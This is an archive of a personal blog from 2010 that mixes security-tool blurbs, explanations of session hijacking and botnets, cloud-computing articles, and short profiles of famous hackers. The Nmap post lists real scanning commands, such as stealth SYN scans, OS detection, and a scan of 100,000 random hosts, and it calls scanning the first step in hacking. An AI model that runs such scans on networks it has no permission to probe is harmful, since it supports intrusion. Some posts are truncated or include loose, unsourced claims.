Friday, December 24, 2010

Shadow Security Scanner

http://www.safety-lab.com
· Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments.
· Shadow Security Scanner includes vulnerability auditing modules for many systems and services.
These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP,LDAP,TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL,IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and
These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and more.
Running on its native Windows platform, SSS also scans servers built practically on any platform, successfully revealing vulnerabilities in Unix, Linux, FreeBSD, OpenBSD, Net BSD, Solaris and, of course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, SSS is the able to detect faults with CISCO, HP, and other network equipment. It is also capable of tracking more than 2,000 audits per system.
The Rules and Settings Editor will be essential for the users willing only to scan the desired ports and services without wasting time and resources on scanning other services. Flexible tuning lets system administrators manage scanning depth and other options to make benefit of speed - optimized network scanning without any loss in scanning quality.

Hacking Tool: WebInspect

 This method will scan the web server for the top 20 vulnerabilities list published by SANS/FBI (www.sans.org)

· WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks.
· It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.
· It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages
WebInspect enables application and web services developers to automate the discovery of security vulnerabilities as they build applications, access detailed steps for remediation of those vulnerabilities and deliver secure code for final quality assurance testing.
With WebInspect, the developer can find and correct vulnerabilities at their source, before attackers can exploit them. WebInspect provides the technology necessary to identify vulnerabilities at the next level, the Web application.

Types of session Hijacking

There are two types of hijacking attacks:
1. Active
In an active attack, an attacker finds an active session and takes over.
2. Passive
With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.

Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.
Generally a passive attack uses sniffers on the network allowing the attacker to obtain information such as user id and password so that he can use it later to logon as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed when raw access to a network is obtained. Counters against this attack range from using identification schemes such as one-time password (e.g. skey) to ticketing identification (such as Kerberos). While these may keep sniffing from yielding any productive results, they do not insure the network from an active attack neither as long as the data is neither digitally signed nor encrypted.
In an active attack, the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle. These have been discussed at length under the discussion covering the various steps involved in a session hijack.
This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial s

What Is A Botnet?

A large number of computers that have been infected, and effectively hijacked, can be grouped together to achieve a common purpose.
This group of hijacked computers is commonly referred to as a ‘botnet’.

what is a botnet?

Cyber criminals, who are often part of global syndicates, can remotely control all of the machines in a botnet whilst retaining almost complete anonymity.
Botnets are often utilised for a variety of purposes, all without the user’s knowledge.
These nefarious tasks include -
§ sending huge amounts of spam emails
§ launching denial of service attacks against targeted websites
§ spreading viruses
§ stealing personal information for identity theft attacks
Additionally, because botnets are controlled remotely, they can be used to install software, such as keyloggers, which can then be used for monitoring keystrokes on a computer keyboard.
This will then typically yield passwords and information about various accounts, such as bank accounts and social networking profiles, allowing the controller(s) of the botnet to commit fraud or propagate the hijacking through other sites.
At this moment in time there is no easy method of disabling botnets as those behind them are extremely clever at hiding their work and re-routing information in order to evade detection.
There are a large number of botnets in existence across the globe, the most notable of which is probably Waledec which is linked to the notorious Conficker worm, and may have several millions of computers in its network.

What is Cloud Computing?

What cloud computing really means

Cloud computing comes into focus only when you think about what IT always needs: a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software. Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT’s existing capabilities.

Cloud computing is at an early stage, with a motley crew of providers large and small delivering a slew of cloud-based services, from full-blown applications to storage services to spam filtering. Yes, utility-style infrastructure providers are part of the mix, but so are SaaS (software as a service) providers such as Salesforce.com. Today, for the most part, IT must plug into cloud-based services individually, but cloud computing aggregators and integrators are already emerging.

InfoWorld talked to dozens of vendors, analysts, and IT customers to tease out the various components of cloud computing. Based on those discussions, here’s a rough breakdown of what cloud computing is all about:

1. SaaS
This type of cloud computing delivers a single application through the browser to thousands of customers using a multitenant architecture. On the customer side, it means no upfront investment in servers or software licensing; on the provider side, with just one app to maintain, costs are low compared to conventional hosting. Salesforce.com is by far the best-known example among enterprise applications, but SaaS is also common for HR apps and has even worked its way up the food chain to ERP, with players such as Workday. And who could have predicted the sudden rise of SaaS ”desktop” applications, such as Google Apps and Zoho Office?

2. Utility computing
The idea is not new, but this form of cloud computing is getting new life from Amazon.com, Sun, IBM, and others who now offer storage and virtual servers that IT can access on demand. Early enterprise adopters mainly use utility computing for supplemental, non-mission-critical needs, but one day, they may replace parts of the datacenter. Other providers offer solutions that help IT create virtual datacenters from commodity servers, such as 3Tera’s AppLogic and Cohesive Flexible Technologies’ Elastic Server on Demand. Liquid Computing’s LiquidQ offers similar capabilities, enabling IT to stitch together memory, I/O, storage, and computational capacity as a virtualized resource pool available over the network.

3. Web services in the cloud
Closely related to SaaS, Web service providers offer APIs that enable developers to exploit functionality over the Internet, rather than delivering full-blown applications. They range from providers offering discrete business services — such as Strike Iron and Xignite — to the full range of APIs offered by Google Maps, ADP payroll processing, the U.S. Postal Service, Bloomberg, and even conventional credit card processing services.

4. Platform as a service
Another SaaS variation, this form of cloud computing delivers development environments as a service. You build your own applications that run on the provider’s infrastructure and are delivered to your users via the Internet from the provider’s servers. Like Legos, these services are constrained by the vendor’s design and capabilities, so you don’t get complete freedom, but you do get predictability and pre-integration. Prime examples include Salesforce.com’s Force.com,Coghead and the new Google App Engine. For extremely lightweight development, cloud-basedmashup platforms abound, such as Yahoo Pipes or Dapper.net.

5. MSP (managed service providers)
One of the oldest forms of cloud computing, a managed service is basically an application exposed to IT rather than to end-users, such as a virus scanning service for e-mail or an application monitoring service (which Mercury, among others, provides). Managed security services delivered by SecureWorks, IBM, and Verizon fall into this category, as do such cloud-based anti-spam services as Postini, recently acquired by Google. Other offerings include desktop management services, such as those offered by CenterBeam or Everdream.

6. Service commerce platforms
A hybrid of SaaS and MSP, this cloud computing service offers a service hub that users interact with. They’re most common in trading environments, such as expense management systems that allow users to order travel or secretarial services from a common platform that then coordinates the service delivery and pricing within the specifications set by the user. Think of it as an automated service bureau. Well-known examples include Rearden Commerce and Ariba.

7. Internet integration
The integration of cloud-based services is in its early days. OpSource, which mainly concerns itself with serving SaaS providers, recently introduced the OpSource Services Bus, which employs in-the-cloud integration technology from a little startup called Boomi. SaaS provider Workday recently acquired another player in this space, CapeClear, an ESB (enterprise service bus) provider that was edging toward b-to-b integration. Way ahead of its time, Grand Central — which wanted to be a universal “bus in the cloud” to connect SaaS providers and provide integrated solutions to customers — flamed out in 2005.



Differences Between Dedicated Server, Cloud Computing and VPS

Many people still do not know or are confused when speaking of the major differences between Cloud Server Hosting, Virtual Private Servers (VPS) and Dedicated Servers. Starting with the most basic, you know what to serve?

Quite simply, all the three technologies are used to store data, host websites and structures of e- mail, besides running various applications and softwares. So if they serve for the same thing because they are different?

Each has a different characteristic, let us understand :

Dedicated Servers

It is a physical machine, usually allocated on a fully equipped data center and is totally dedicated to one customer who requires high reliability and high performance hardware ( processing, memory , etc.)… If the client needs more resources, you must purchase more hardware and manually install or exchange server. Its main advantage is the high performance and flexibility and its disadvantage is the high price and inability to upgrade / downgrade immediately. This is one of the best flexible solution than shared web hosting, as because the owner gets a total control over the hosting environment and every aspects of the dedicated hosting, which includes the selection of operating system, server hardware, etc… Some web hosting providers may provide the server administration for free, but usually, the client has to manage the server administration and management tasks.

Cloud Server Hosting (Cloud Computing)

Already Cloud Server is a fractionation of a number of resources available to multiple servers and storage arrays. Through an intelligent architecture, you can allocate these resources allows scalability without losing performance. Besides the economy and flexibility, there are numerous advantages to this technology.

Virtual Private Servers (VPS)

It is the fractionation of resources from one physical server, this fractionation being allocated to a single client. VPS is an ideal choice for businesses that requires same flexibility, reliability, security, root access, stability, etc… at much affordable rates that a dedicated server offers. In this technology there is no guarantee of processing and in case of hardware failures, client applications that depend on it will also fail, as there is integration servers like the Cloud.

We simplify the concepts so that everyone can understand, of course there are many other details, but overall this is it!
How Cloud Computing Can Be A Better Way | How is Cloud Computing Different than Traditional Applications?

In order for traditional applications to work properly, they require a data center with power, an office, cooling, servers, networks, bandwidth and storage. Even once you’ve met all those requirements, you need a professional to install them, configure them and make sure they’re running as they should. As much time, effort and money that goes into these programs by large businesses, you can only imagine the headache they pose for small businesses or individuals.

Cloud computing will help you run your business better and more efficiently for many reasons. Unlike many traditional business apps, applications that are cloud based can be up and running in a couple of days. Let’s face it – for your business to be efficient, you can’t have a lot of downtime. Cloud computing will also save you money because you don’t have to pay tons of money in employee wages to run your applications as well as many products to keep them running and updated. Any performance or security enhancements and upgrades your cloud based programs need, they’ll get automatically.

Another way you’ll save with cloud computing is by not having to constantly buy software and servers. They don’t take up as much of your IT resources as traditional applications.


Cloud Computing Market Will Reach $16.7 Billion by 2013

As more and more organizations starting to transition their data into the cloud and tap into web-based applications, the global cloud computing market is continuing to grow at high speed.Analyst firm 451 Market Monitor has predicted that it expects the cloud computing marketplace to reach $16.7 billion in revenue by 2013.

According to its report, the large and well-established software-as-a-service (SaaS (News - Alert)) category, cloud computing will grow from revenue of $8.7bn in 2010 to $16.7bn in 2013, registering a compound annual growth rate (CAGR) of 24 percent.

The research firm believes that the core cloud computing market will grow at much more rapid pace as the cloud increasingly becomes a mainstream IT strategy embraced by corporate enterprises and government agencies.

Excluding SaaS revenue, cloud-delivered platform and infrastructure services will grow from $964m in revenue in 2010 to $3.9bn 2013 - a CAGR of 60% - the report said.

The core market includes platform-as-a-service (PaaS) and infrastructure-as-a-service (IaaS) offerings, as well as the cloud-delivered software used to build and manage a cloud environment, which The 451 Group (News - Alert) calls 'software infrastructure as a service' (SIaaS).

Cloud-based storage will play a starring role in cloud growth, accounting for nearly 40 percent of the core cloud pie in 2010. "We view storage as the most fertile sector, and predict that cloud storage will experience the strongest growth in the cloud platforms segment," the report says.

In June, Gartner said worldwide cloud computing services market is poised for strong growth and its revenue might reach USD 148.8 billion by 2014.

Last month, another market analyst firm Renub Research had predicted that global cloud computing market might cross $25 billion by the end of 2013.

MY IDEAS: I think we can also develop cloud processing units. In which we will have a super computer in a place and the users of it will only need to have a high really high speed internet and a small processor which only need to interact a software ( browser like) that would take the info from the user send it to super computer and present the output info to the user. This idea would be cost-efficient when people will have to buy expensive computers processors and graphic cards but only the would have to buy a 5 dollar processor and every thing will be done by the supercomputer in backend. My ideas about the payments is that a person will pay for the number of MBs that the supercomputer processed. ( M. Haseeb Javed)

Your Keybord can be dirtier than your Toilet seat

Computer keyboards can harbour more harmful bacteria than a lavatory seat, it has been claimed.
Many users are at risk of becoming ill with stomach bugs, according to the consumer group.
Which warned that ‘qwerty tummy’, named after the first six letters on a keyboard, could sweep through workplaces after tests on equipment in its own London offices showed alarming results.
One keyboard was so dirty that a microbiologist ordered it to be removed, quarantined and cleaned.
It had 150 times the acceptable limit for bacteria and was five times as filthy as a typical lavatory seat.
Anyone who eats a sandwich or piece of fruit having been tapping on such a keyboard can pick up bacteria that could lead to a stomach upset.
The scientist swabbed 33 keyboards for food poisoning bugs e.coli, coliforms, staphylococcus aureus and enterobacteria and compared the results to those found on a lavatory seat and lavatory door handle
Four of the keyboards were considered a potential health hazard and one was “condemned”.
Two had “warning levels” of staphylococcus aureus and two others had “worryingly elevated” levels of coliforms and enterobacteria, “putting users at high risk of becoming ill from contact”.
The expert said the findings were typical of offices all over Britain.
Which? computing editor Sarah Kidner said: “The shocking results revealed that some of these keyboards were harbouring harmful bacteria that could potentially give their users a stomach upset.
“The germs found could cause food poisoning symptoms such as diarrhoea.
“The main cause of a bug-infested keyboard is eating lunch at desks, as the food deposits encourage the growth of millions of bacteria.
“Poor personal hygiene, such as dodging hand washing after going to the lavatory, may also be to blame.
“Most people don’t give much thought to the grime that builds up on their PC, but if you don’t clean your computer, you might as well eat your lunch off a lavatory seat.”
Which? found that one in ten people never clean their keyboard, while 20 per cent never clean their mouse.
Around half cleaned their keyboard less than one a month.
The modern practice of “hotdesking”, in which staff sit at different desks every week, means that workers do not know who has been using their keyboard before them.
Miss Kidner said workers and home PC users should give their keyboards a regular clean, adding: “It’s quite simple to do and could prevent your computer becoming a health hazard.”
Which? says users should unplug computers before wiping surfaces with a damp, soft, lint-free cloth.
Keyboards should be unplugged, turned upside down and shaken.

Jonathan James The Hacker

 James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an anonymous PBS interview, he professes, "I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off."
James's major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive emails and capture employee usernames and passwords.
James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, "The software supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, "The code itself was crappy . . . certainly not worth $1.7 million like they claimed."
Given the extent of his intrusions, if James, also known as "c0mrade," had been an adult he likely would have served at least 10 years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he's learned his lesson and might start a computer security company.
Source: itsecurity.com

Adrian Lamo The Hacker

Lamo's claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the "homeless hacker," he used Internet connections at Kinko's, coffee shops and libraries to do his intrusions. In a profile article, "He Hacks by Day, Squats by Night," Lamo reflects, "I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional."
Lamo's intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do penetration testing, it's legal. What Lamo did is not.
When he broke into The New York Times' intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times' LexisNexis account to research high-profile subject matter.
For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.
Source: itsecurity.com

Kevin Mitnick The Hacker

A self-proclaimed "hacker poster boy," Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as "the most wanted computer criminal in United States history." His exploits were detailed in two movies: Freedom Downtime and Takedown.
Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick's mischief got serious when he went on a two and a half year "coast-to-coast hacking spree." The CNN article, "Legendary computer hacker released from prison," explains that "he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system." He then hacked into computer expert and fellow hacker Tsutomu Shimomura's home computer, which led to his undoing.
Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.
Source: itsecurity.com

Kevin Poulsen The Hacker

 Also known as Dark Dante, Poulsen gained recognition for his hack of LA radio's KIIS-FM phone lines, which earned him a brand new Porsche, among other items. Law enforcement dubbed him "the Hannibal Lecter of computer crime."
Authorities began to pursue Poulsen after he hacked into a federal investigation database. During this pursuit, he further drew the ire of the FBI by hacking into federal computers for wiretap information.
His hacking specialty, however, revolved around telephones.
Poulsen's most famous hack, KIIS-FM, was accomplished by taking over all of the station's phone lines. In a related feat, Poulsen also "reactivated old Yellow Page escort telephone numbers for an acquaintance who then ran a virtual escort agency." Later, when his photo came up on the show Unsolved Mysteries, 1-800 phone lines for the program crashed. Ultimately, Poulsen was captured in a supermarket and served a sentence of five years.
Since serving time, Poulsen has worked as a journalist. He is now a senior editor for Wired News. His most prominent article details his work on identifying 744 sex offenders with MySpace profiles.
Source: itsecurity.com

Robert Tappan Morris The Hacker

 Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the Morris Worm, the first computer worm to be unleashed on the Internet. As a result of this crime, he was the first person prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris wrote the code for the worm while he was a student at Cornell. He asserts that he intended to use it to see how large the Internet was. The worm, however, replicated itself excessively, slowing computers down so that they were no longer usable. It is not possible to know exactly how many computers were affected, but experts estimate an impact of 6,000 machines. He was sentenced to three years' probation, 400 hours of community service and a fined $10,500.
Morris is currently working as a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. He principally researches computer network architectures including distributed hash tables such as Chord and wireless mesh networks such as Roo
Source: itsecurity.com

Stephen Wozniak The Hacker

 "Woz" is famous for being the "other Steve" of Apple. Wozniak, along with current Apple CEO Steve Jobs, co-founded Apple Computer. He has been awarded with the National Medal of Technology as well as honorary doctorates from Kettering University and Nova Southeastern University. Additionally, Woz was inducted into the National Inventors Hall of Fame in September 2000.
Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about phone phreaking in Esquire, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.
Wozniak dropped out of college and came up with the computer that eventually made him famous. Jobs had the bright idea to sell the computer as a fully assembled PC board. The Steves sold Wozniak's cherished scientific calculator and Jobs' VW van for capital and got to work assembling prototypes in Jobs' garage. Wozniak designed the hardware and most of the software. In the Letters section of Woz.org, he recalls doing "what Ed Roberts and Bill Gates and Paul Allen did and tons more, with no help." Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz no longer works full time for Apple, focusing primarily on philanthropy instead. Most notable is his function as fairy godfather to the Los Gatos, Calif. School District. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."
Source: itsecurity.com

Tim Berners-Lee The Hacker

Berners-Lee is famed as the inventor of the World Wide Web, the system that we use to access sites, documents and files on the Internet. He has received numerous recognitions, most notably the Millennium Technology Prize.
While a student at Oxford University, Berners-Lee was caught hacking access with a friend and subsequently banned from University computers. w3.org reports, "Whilst [at Oxford], he built his first computer with a soldering iron, TTL gates, an M6800 processor and an old television." Technological innovation seems to have run in his genes, as Berners-Lee's parents were mathematicians who worked on the Manchester Mark1, one of the earliest electronic computers.
While working with CERN, a European nuclear research organization, Berners-Lee created a hypertext prototype system that helped researchers share and update information easily. He later realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.
Source: itsecurity.com

Linus Torvalds The Hacker

Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the current Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."
Source: itsecurity.com

Richard Stallman The Hacker

 Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom."
Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker " on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.

Source: itsecurity.com

Tsutomu Shimomura The Hacker

Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrink wrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.
Source: itsecurity.com

LOYD BLANKENSHIP The Hacker

Also known as The Mentor, Blankenship was a member of a couple of hacker elite groups in the 1980s – notably the Legion Of Doom, who battled for supremacy online against the Masters Of Deception. However, his biggest claim to fame is that he is the author of the hacker Manifesto (The Conscience of a hacker), which he wrote after he was arrested in 1986. The Manifesto states that a hacker’s only crime is curiosity and is looked at as not only a moral guide by hackers up to today, but also a cornerstone of hacker philosophy. It was reprinted in Phrack magazine and even made its way into the 1995 film Hackers, which starred Angelina Jolie.

MICHAEL CALCE The Hacker

Calce gained notoriety when he was just 15 years old by hacking into some of the largest commercial websites in the world. On Valentine’s Day in 2000, using the hacker alias MafiaBoy, Calce launched a series of denial-of-service attacks across 75 computers in 52 networks, which affected sites such as eBay, Amazon and Yahoo. He was arrested after he was noticed boasting about his hack in online chat rooms. He was received a sentence of eight months of “open custody,” one year of probation, restricted use of the internet, and a small fine.

JOHN DRAPER The Hacker

AKA Captain Crunch. Although technically a phone phreak, the Captain is seen by many as the father of modern “hackery” and phreaking, as well as being somewhat of a legend. Born in 1944, his legend began when he was informed by a friend that a toy whistle given away in boxes of the Cap’n Crunch cereal would emit a 2600 hertz tone when the 3 rd hole was glued up. This tone was a frequency that was used in the making of phone calls at the time and would eventually lead to Draper creating “blue boxes”, devices capable of replicating other dialing tones, effectively making calls for free. So here was a man that could circumvent phone charges all thanks to a small cereal box toy. Having given an interview with Esquire magazine in 1971, it exposed the world to the subject of phone phreaking and Draper was arrested in 1972 on toll fraud charges, being sentenced to five years’ probation. In the mid 70s, he taught some of his skills to Apple co-founders Steve Jobs and Steve Wozniak, after Wozniak had read the Esquire article. Draper was even temporarily employed by Apple, even writing the code for EasyWriter, the first Apple II word processor.

DAVID L. SMITH The Hacker

Smith is the author of the notorious Melissa worm virus, which was the first successful email-aware virus distributed in the Usenet discussion group alt. sex. The virus original form was sent via email. Smith was arrested and later sentenced to jail for causing over $80 million worth of damage.

SVEN JASCHAN The Hacker

Jaschan was found guilty of writing the Netsky and Sasser worms in 2004 while he was still a teenager. The viruses were found to be responsible for 70 per cent of all the malware seen spreading over the internet at the time. Jaschan received a suspended sentence and three years probation for his crimes. He was also hired by a security company.

GARY McKINNON The Hacker

Accused of mounting the largest ever hack of United States government computer networks — including Army, Air Force, Navy and NASA systems The court has recommended that McKinnon be extradited to the United States to face charges of illegally accessing 97 computers, causing US$700,000 in damage.

VLADIMIR LEVIN The Hacker

Levin accessed the accounts of several large corporate customers of Citibank via their dial-up wire transfer service (Financial Institutions Citibank Cash Manager) and transferred funds to accounts set up by accomplices in Finland, the United States, the Netherlands, Germany and Israel. In 2005 an alleged member of the former St. Petersburg hacker group, claiming to be one of the original Citibank penetrators, published under the name ArkanoiD a memorandum on popular Provider.net.ru website dedicated to telecom market. According to him, Levin was not actually a scientist (mathematician, biologist or the like) but a kind of ordinary system administrator who managed to get hands on the ready data about how to penetrate in Citibank machines and then exploit them.ArkanoiD emphasized all the communications were carried over X.25 network and the Internet was not involved. ArkanoiD’s group in 1994 found out Citibank systems were unprotected and it spent several weeks examining the structure of the bank’s USA-based networks remotely. Members of the group played around with systems’ tools (e.g. were installing and running games) and were unnoticed by the bank’s staff. Penetrators did not plan to conduct a robbery for their personal safety and stopped their activities at some time. Someone of them later handed over the crucial access data to Levin (reportedly for the stated $100).

MARK ABENE The Hacker

Born 1972, better known by his pseudonym Phiber Optik, is a computer security hacker from New York City. Phiber Optik was once a member of the hacker Groups Legion of Doom and Masters of Deception. In 1994, he served a one-year prison sentence for conspiracy and unauthorized access to computer and telephone systems. Phiber Optik was a high-profile hacker in the early 1990s, appearing in The New York Times, Harper’s, Esquire, in debates and on television. Phiber Optik is an important figure in the 1995 non-fiction book Masters of Deception — The Gang that Ruled Cyberspace.

ONEL A. DE GUZMAN The Hacker

A Filipino computer student, Greatest hacker of all time. He was creator of “Love Bug” virus that crippled computer e-mail systems worldwide.

CHENG ING-HAU The Hacker

He was the creator of one of the deadly virus of all time “Chernobyl computer virus ” which had melted down many computers worldwide.

MUDGE The Hacker

“Mudge” along with fellow hackers told the committee that computer security is so lax, they could disable the entire Internet in a half-hour.

JON LECH JOHANSEN The Hacker

Johansen, who became a hero to computer hackers and was deemed a villain by Hollywood, is on trial for writing and distributing a program called DeCSS, software which makes it possible to copy protected DVD films. Prosecutors have asked to have his computers confiscated and called for him to pay $1,400 in court costs.

DIMITRY SKLYAROV The Hacker

Russian computer programmer who was charged with violating copyrights, Sklyarov was jailed after developing software that allows the user to circumvent the copyright protections in Adobe Systems eBook reader program.

DENNIS MORAN The Hacker

Moran, known on the Web as “Coolio,” pleaded guilty to hacking into national computer sites last year belonging to the Army, the Air Force and the anti-drug Dare.com.

Monday, December 13, 2010

Basic Commands of Nmap.

Basic commands of Nmap are as following:

nmap -v scanme.nmap.org
This option scans all reserved TCP ports on the machine scanme.nmap.org . The -v option enables verbose mode.
nmap -sS -O scanme.nmap.org/24
Launches a stealth SYN scan against each machine that is up out of the 256 IPs on the class C sized network where Scanme resides. It also tries to determine what operating system is running on each host that is up and running. This requires root privileges because of the SYN scan and OS detection.
nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
Launches host enumeration and a TCP scan at the first half of each of the 255 possible eight-bit subnets in the 198.116 class B address space. This tests whether the systems run SSH, DNS, POP3, or IMAP on their standard ports, or anything on port 4564. For any of these ports found open, version detection is used to determine what application is running.
nmap -v -iR 100000 -Pn -p 80
Asks Nmap to choose 100,000 hosts at random and scan them for web servers (port 80). Host enumeration is disabled with -Pn since first sending a couple probes to determine whether a host is up is wasteful when you are only probing one port on each target host anyway.
nmap -Pn -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
This scans 4096 IPs for any web servers (without pinging them) and saves the output in grepable and XML formats.

What is Nmap?

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich)  used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses. Unlike many simple port scanners that just send packets at some predefined constant rate, nmap accounts for the network conditions (latency fluctuations, network congestion, the target interference with the scan) during the run. Also, owing to the large and active user community providing feedback on its features and contributing back, nmap has succeeded to extend its discovery capabilities beyond basic host being up/down or port being open/closed to being able to determine operating system of the target, names and versions of the listening services, estimate uptime, the type of device, presence of the firewall.
Nmap runs on Linux, Microsoft Windows, Solaris,HP-UX and BSD variants (including Mac OS X), and also on AmigaOS and SGI IRIX. Linux is the most popular nmap platform with Windows following it closely.


Nmap is a software that search the host for the open ports and the services available that is the first step in hacking a website or computer.

Friday, December 10, 2010

Metasploit Basic Tutorial.

Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them and on the other hand it can  alsobe used to break into remote systems.

